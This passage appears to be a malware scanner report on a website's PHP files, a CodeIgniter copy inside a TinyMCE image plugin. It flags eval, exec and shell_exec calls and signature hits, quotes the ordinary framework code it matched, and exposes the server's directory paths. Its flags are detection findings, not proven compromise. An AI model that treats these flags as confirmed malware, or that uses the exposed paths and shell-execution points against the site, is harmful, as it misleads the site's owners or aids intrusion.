eval('?>'.preg_replace("/;*\s*\?>/", "; ?>", str_replace('<?=', 'echo ', file_get_contents($_ci_path)))); } else { include($_ci_path); } log_message('debug', 'File loaded: '.$_ci_path); if ($_ci_return === TRUE) { $buffer = ob_get_contents(); @ob_end_clean(); return $buffer; } if (ob_get_level() > $this->_ci_ob_level + 1) { ob_end_flush(); } else { $_ci_CI->output->append_output(ob_get_contents()); @ob_end_clean(); } } protected function _ci_load_class($class, $params = NULL, $object_name ...
| Sign 11413268 Line: 829 Dangerous Malware Signature (hash: 11413268) |
eval('?>
|
|
/var/www/kievflotq/kievflot.ua/local/templates/kievflot/components/khayr/main.comment/main_beta/tinymce/plugins/jbimages/ci/system/core/Input.php Size: 17.89 kB Created: 2017-05-21 22:21:35 Modified: 2023-06-30 13:57:55 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 720 Dangerous Malware Signature (hash: 11413268) |
exploit
|
|
/var/www/kievflotq/kievflot.ua/local/templates/kievflot/components/khayr/main.comment/main_beta/tinymce/plugins/jbimages/ci/system/libraries/Image_lib.php Size: 36.47 kB Created: 2017-05-21 22:21:35 Modified: 2023-06-30 13:57:55 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec($cmd, $output, $retval); if ($retval > 0) { $this->set_error('imglib_image_process_failed'); return FALSE; } @chmod($this->full_dst_path, FILE_WRITE_MODE); return TRUE; } function image_process_netpbm($action = 'resize') { if ($this->library_path == '') { $this->set_error('imglib_libpath_invalid'); return FALSE; } switch ($this->image_type) { case 1 : $cmd_in = 'giftopnm'; $cmd_out = 'ppmtogif'; break; case 2 : $cmd_in = 'jpegtopnm'; $cmd_out = 'ppmtojpeg'; break; case 3 : $cmd_in = 'pngtop...
|
|
/var/www/kievflotq/kievflot.ua/local/templates/kievflot/components/khayr/main.comment/main_beta/tinymce/plugins/jbimages/ci/system/libraries/Upload.php Size: 26.90 kB Created: 2017-05-21 22:21:35 Modified: 2023-06-30 13:57:55 Warns: 2
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec($cmd, $mime, $return_status); if ($return_status === 0 && is_string($mime) && preg_match($regexp, $mime, $matches)) { $this->file_type = $matches[1]; return; } } if ( (bool) @ini_get('safe_mode') === FALSE && function_exists('shell_exec')) { $mime = @shell_exec($cmd); if (strlen($mime) > 0) { $mime = explode("\n", trim($mime)); if (preg_match($regexp, $mime[(count($mime) - 1)], $matches)) { $this->file_type = $matches[1]; return; } } } if (function_exists('popen')) { $proc = @popen($cmd, 'r...
| Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec] |
shell_exec($cmd); if (strlen($mime) > 0) { $mime = explode("\n", trim($mime)); if (preg_match($regexp, $mime[(count($mime) - 1)], $matches)) { $this->file_type = $matches[1]; return; } } } if (function_exists('popen')) { $proc = @popen($cmd, 'r'); if (is_resource($proc)) { $mime = @fread($proc, 512); @pclose($proc); if ($mime !== FALSE) { $mime = explode("\n", trim($mime)); if (preg_match($regexp, $mime[(count($mime) - 1)], $matches)) { $this->file_type = $matches[1]; return; } } } } } if (funct...
|
|
/var/www/kievflotq/kievflot.ua/local/templates/kievflot/components/khayr/main.comment/to_delete/tinymce/plugins/jbimages/ci/system/core/Loader.php Size: 29.86 kB Created: 2017-05-21 22:21:35 Modified: 2023-06-30 13:57:55 Warns: 1 Dangers: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('?>'.preg_replace("/;*\s*\?>/", "; ?>", str_replace('<?=', 'echo ', file_get_contents($_ci_path)))); } else { include($_ci_path); } log_message('debug', 'File loaded: '.$_ci_path); if ($_ci_return === TRUE) { $buffer = ob_get_contents(); @ob_end_clean(); return $buffer; } if (ob_get_level() > $this->_ci_ob_level + 1) { ob_end_flush(); } else { $_ci_CI->output->append_output(ob_get_contents()); @ob_end_clean(); } } protected function _ci_load_class($class, $params = NULL, $object_name ...
| Sign 11413268 Line: 829 Dangerous Malware Signature (hash: 11413268) |
eval('?>
|
|
/var/www/kievflotq/kievflot.ua/local/templates/kievflot/components/khayr/main.comment/to_delete/tinymce/plugins/jbimages/ci/system/core/Input.php Size: 17.89 kB Created: 2017-05-21 22:21:35 Modified: 2023-06-30 13:57:55 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 720 Dangerous Malware Signature (hash: 11413268) |
exploit
|
|
/var/www/kievflotq/kievflot.ua/local/templates/kievflot/components/khayr/main.comment/to_delete/tinymce/plugins/jbimages/ci/system/libraries/Image_lib.php Size: 36.47 kB Created: 2017-05-21 22:21:35 Modified: 2023-06-30 13:57:55 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec($cmd, $output, $retval); if ($retval > 0) { $this->set_error('imglib_image_process_failed'); return FALSE; } @chmod($this->full_dst_path, FILE_WRITE_MODE); return TRUE; } function image_process_netpbm($action = 'resize') { if ($this->library_path == '') { $this->set_error('imglib_libpath_invalid'); return FALSE; } switch ($this->image_type) { case 1 : $cmd_in = 'giftopnm'; $cmd_out = 'ppmtogif'; break; case 2 : $cmd_in = 'jpegtopnm'; $cmd_out = 'ppmtojpeg'; break; case 3 : $cmd_in = 'pngtop...
|
|
/var/www/kievflotq/kievflot.ua/local/templates/kievflot/components/khayr/main.comment/to_delete/tinymce/plugins/jbimages/ci/system/libraries/Upload.php Size: 26.90 kB Created: 2017-05-21 22:21:35 Modified: 2023-06-30 13:57:55 Warns: 2
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec($cmd, $mime, $return_status); if ($return_status === 0 && is_string($mime) && preg_match($regexp, $mime, $matches)) { $this->file_type = $matches[1]; return; } } if ( (bool) @ini_get('safe_mode') === FALSE && function_exists('shell_exec')) { $mime = @shell_exec($cmd); if (strlen($mime) > 0) { $mime = explode("\n", trim($mime)); if (preg_match($regexp, $mime[(count($mime) - 1)], $matches)) { $this->file_type = $matches[1]; return; } } } if (function_exists('popen')) { $proc = @popen($cmd, 'r...
| Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec] |
shell_exec($cmd); if (strlen($mime) > 0) { $mime = explode("\n", trim($mime)); if (preg_match($regexp, $mime[(count($mime) - 1)], $matches)) { $this->file_type = $matches[1]; return; } } } if (function_exists('popen')) { $proc = @popen($cmd, 'r'); if (is_resource($proc)) { $mime = @fread($proc, 512); @pclose($proc); if ($mime !== FALSE) { $mime = explode("\n", trim($mime)); if (preg_match($regexp, $mime[(count($mime) - 1)], $matches)) { $this->file_type = $matches[1]; return; } } } } } if (funct...
|
|